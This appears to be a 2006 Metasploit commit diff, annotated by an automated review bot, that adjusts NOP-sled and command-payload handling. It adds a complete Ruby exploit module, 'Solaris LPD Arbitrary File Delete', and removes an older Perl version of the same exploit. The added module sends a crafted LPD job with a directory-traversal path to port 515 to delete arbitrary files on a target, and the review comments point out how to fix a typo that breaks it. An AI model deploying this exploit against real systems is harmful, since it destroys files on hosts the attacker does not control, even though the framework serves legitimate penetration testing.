Miscellaneous fixes, changes to CMD payloads

git-svn-id: file:///home/svn/incoming/trunk@3296 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2006-01-02 01:12:36 +00:00
parent 09d21fbced
commit 9fc93bbe56
7 changed files with 120 additions and 218 deletions


@ -51,6 +51,11 @@ module Exploit
# job.
#
def self.exploit_simple(exploit, opts)
p exploit.methods.sort
p exploit.payload?
p exploit.payload_info
# Make sure parameters are valid.
if (opts['Payload'] == nil)
raise MissingPayloadError,
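Review bot: The three `p` calls inserted at the top of exploit_simple (`p exploit.methods.sort`, `p exploit.payload?`, `p exploit.payload_info`) look like leftover debugging output rather than part of the fix: they write unconditionally to stdout on every exploit run, bypass whatever print/log helpers the framework uses, and `exploit.methods.sort` alone dumps the whole method list. They should be deleted before merge, or if the payload_info dump is genuinely useful, routed through the module's print helper behind a verbosity check. exploit_simple's body continues outside the hunk, so I cannot see whether anything later depends on them.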


@ -110,6 +110,8 @@ class EncodedPayload
# Get the minimum number of nops to use
min = (reqs['MinNops'] || 0).to_i
min = 0 if reqs['DisableNops']
# Check to see if we have enough room for the minimum requirements
if ((reqs['Space']) and
@ -164,6 +166,9 @@ class EncodedPayload
self.nop_sled_size = reqs['MaxNops']
end
# Check for the DisableNops setting
self.nop_sled_size = 0 if reqs['DisableNops']
# Now construct the actual sled
if (self.nop_sled_size > 0)
pinst.compatible_nops.each { |nopname, nopmod|
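Review bot: `DisableNops` is now honored in two unrelated places of EncodedPayload — `min = 0 if reqs['DisableNops']` in the first hunk and `self.nop_sled_size = 0 if reqs['DisableNops']` here — and neither site explains why both are needed, so a later edit to one of them can silently break the other. The first zero keeps the space check between the hunks from counting a sled that will never be built; the second overrides the MaxNops assignment a few lines above. I would replace the bare `# Check for the DisableNops setting` with something like `# DisableNops (set by payloads that carry no sled, e.g. command payloads per the commit title) must zero both the MinNops requirement used by the space check above and the sled size used here`. Note that the test is plain truthiness, so `'DisableNops' => false` behaves exactly like leaving the key out, which matches how the two exploit hunks in this commit set it to `true`. The enclosing method begins and ends outside both hunks.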


@ -68,23 +68,14 @@ ARCH_X86 = 'x86'
ARCH_MIPS = 'mips'
ARCH_PPC = 'ppc'
ARCH_SPARC = 'sparc'
ARCH_CMD = 'cmd'
ARCH_TYPES =
[
ARCH_X86,
ARCH_MIPS,
ARCH_PPC,
ARCH_SPARC
ARCH_SPARC,
ARCH_CMD,
]
ARCH_CMD_UNIX = 'cmd_unix'
ARCH_CMD_LINUX = 'cmd_linux'
ARCH_CMD_BSD = 'cmd_bsd'
ARCH_CMD =
[
ARCH_CMD_UNIX,
ARCH_CMD_LINUX,
ARCH_CMD_BSD
]
ARCH_ALL = ARCH_TYPES + ARCH_CMD
ARCH_ALL = ARCH_TYPES
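Review bot: `ARCH_CMD` changes type in this hunk — it was an Array of the three `ARCH_CMD_*` strings and is now the String `'cmd'`, while `ARCH_CMD_UNIX`, `ARCH_CMD_LINUX` and `ARCH_CMD_BSD` disappear entirely; any code that still iterates `ARCH_CMD` or references the removed constants will fail at load time, and the only caller visible in this commit is the telnet module's `'Arch' => ARCH_CMD`, so I cannot tell whether the rest of the tree was audited. A second, smaller point: `ARCH_ALL = ARCH_TYPES` no longer builds a new Array but aliases the same unfrozen object, so `ARCH_ALL << something` would mutate `ARCH_TYPES` too; freezing the literal (`].freeze` on the ARCH_TYPES closing bracket) or writing `ARCH_ALL = ARCH_TYPES.dup` removes that trap. The enclosing module header is outside the hunk.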


@ -0,0 +1,102 @@
require 'msf/core'
module Msf
class Exploits::Solaris::Lpd::CascadeDelete < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris LPD Arbitrary File Delete',
'Description' => %q{
This module uses a vulnerability in the Solaris line printer
daemon to delete arbitrary files on an affected system. This
can be used to exploit the rpc.walld format string flaw, the
missing krb5.conf authentication bypass, or simply delete
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
},
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
],
'Targets' =>
[
['Automatic Target', { }]
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515),
OptString.new('RPATH', [ true, "The remote file path to delete"]),
], self.class)
end
def exploit
# Create a simple control file...
control = "Hmetasploit\nPr00t\n";
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
# Establish the first connection to the server
sock1 = connect(false)
# Request a cascaded job
sock1.put("\x02metasploit:framework\n")
res = sock1.get_once
if (not res)
print_status("The target did not accept our job request command")
return
end
# Theoretically, we could delete multiple files at once, however
# the lp daemon will append garbage from memory to the path name
# if we don't stick a null byte after the path. Unfortunately, this
# null byte will prevent the parser from processing the other paths.
control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
dataf = "http://metasploit.com/\n"
print_status("Deleting #{datstore['RPATH']}...")
if (not (
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
send_file(sock1, 3, "dfa" + jid + "metasploit", dataf)
) )
sock1.close
return
end
print_status("Successfully deleted #{datastore['RPATH']} >:-]")
sock1.close
end
def send_file (s, type, name, data='')
s.put(type.chr + data.length.to_s + " " + name + "\n")
res = s.get_once(1)
if (not (res and res[0] == 0))
print_status("The target did not accept our control file command (#{name})")
return
end
s.put(data)
s.put("\x00")
res = s.get_once(1)
if (not (res and res[0] == 0))
print_status("The target did not accept our control file data (#{name})")
return
end
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
return true
end
end
end
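Review bot: `print_status("Deleting #{datstore['RPATH']}...")` in `exploit` misspells `datastore`, so the module raises NameError right after the job-request handshake and never reaches send_file; it should read `print_status("Deleting #{datastore['RPATH']}...")`. The early return when `sock1.get_once` yields nothing also leaves `sock1` open, unlike the two later failure paths which call `sock1.close`; adding `sock1.close` before that `return` (or wrapping the body in `begin`/`ensure`) keeps the connection handling consistent. In `send_file`, `res[0] == 0` relies on `String#[]` with an Integer index returning a character code, which holds for the Ruby of this commit's era but returns a one-character String on later interpreters, where the comparison is always false — worth a comment or a `res[0,1] == "\x00"` form if portability matters. Minor style: `def send_file (s, type, name, data='')` has a space before the parameter list, and the `;` after the `control` assignment is unnecessary.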


@ -1,198 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris LPD Arbitrary File Delete',
'Description' => %q{
This module uses a vulnerability in the Solaris line printer
daemon to delete arbitrary files on an affected system. This
can be used to exploit the rpc.walld format string flaw, the
missing krb5.conf authentication bypass, or simple delete
system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
},
'Author' => [ 'hdm', 'Optyx <optyx@uberhax0r.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
],
'Privileged' => true,
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'solaris',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::solaris_lpd_unlink;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Solaris LPD Arbitrary File Delete',
'Version' => '$Revision$',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
'Optyx <optyx [at] uberhax0r.net>'
],
'Arch' => [ ],
'OS' => [ 'solaris' ],
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
'RPATH' => [1, 'DATA', 'The remote path name to delete'],
},
'Description' => Pex::Text::Freeform(qq{
This module uses a vulnerability in the Solaris line printer daemon
to delete arbitrary files on an affected system. This can be used to exploit
the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
}),
'Refs' =>
[
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
],
'DefaultTarget' => 0,
'Targets' => [['No Target Needed']],
'Keys' => ['lpd'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('RPATH');
my $res;
# We use one connection to configure the spool directory
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
# Send a job request that will trigger the cascade adaptor (thanks Dino!)
$s->Send("\x02"."metasploit:framework\n");
$res = $s->Recv(1, 5);
if (ord($res) != 0) {
$self->PrintLine("[*] The target did not accept our job request command");
return;
}
# The job ID is squashed down to three decimal digits
my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
# Create a simple control file...
my $control = "Hmetasploit\nPr00t\n";
# Theoretically, we could delete multiple files at once, however
# the lp daemon will append garbage from memory to the path name
# if we don't stick a null byte after the path. Unfortunately, this
# null byte will prevent the parser from processing the other paths.
$control .= "U".("../" x 10)."$target_path\x00\n";
my $dataf = "http://metasploit.com/\n";
$self->PrintLine("[*] Sending the malicious cascaded job request...");
if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf) ||
0
) { $s->Close; return }
$self->PrintLine('');
$self->PrintLine("[*] Successfully deleted $target_path >:-]");
return;
}
sub SendFile {
my $self = shift;
my $sock = shift;
my $type = shift;
my $name = shift;
my $data = shift;
$sock->Send(chr($type) .length($data). " $name\n");
my $res = $sock->Recv(1, 5);
if (ord($res) != 0) {
$self->PrintLine("[*] The target did not accept our control file command ($name)");
return;
}
$sock->Send($data);
$sock->Send("\x00");
$res = $sock->Recv(1, 5);
if (ord($res) != 0) {
$self->PrintLine("[*] The target did not accept our control file data ($name)");
return;
}
$self->PrintLine(sprintf("[*] Uploaded %.4d bytes >> $name", length($data)));
return 1;
}
1;
=end
end
end


@ -23,14 +23,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
],
'Privileged' => false,
'Platform' => 'unix',
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "",
'MinNops' => 0,
'MaxNops' => 0,
'BadChars' => '',
'DisableNops' => true,
},
'PayloadCompat' =>
{
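Review bot: The new `'DisableNops' => true` entry replaces the `MinNops`/`MaxNops` pair with no explanation of why a sled is unwanted here, and the key only has meaning because of the EncodedPayload change elsewhere in this commit; a reader of this module alone cannot tell that. A one-line comment such as `# Command payloads are sent verbatim, so EncodedPayload must not prepend a nop sled` above the key would make the intent self-contained; the Icecast_Header_Overflow hunk in this commit makes the identical change and deserves the same comment. The `'Platform' => ['unix', 'solaris']` widening and the `""`→`''` BadChars change are fine as written. The enclosing initialize call starts and ends outside the hunk.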


@ -45,9 +45,7 @@ class Exploits::Windows::Http::Icecast_Header_Overflow < Msf::Exploit::Remote
{
'Space' => 2000,
'BadChars' => "\x0d\x0a\x00",
'MinNops' => 0,
'MaxNops' => 0,
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>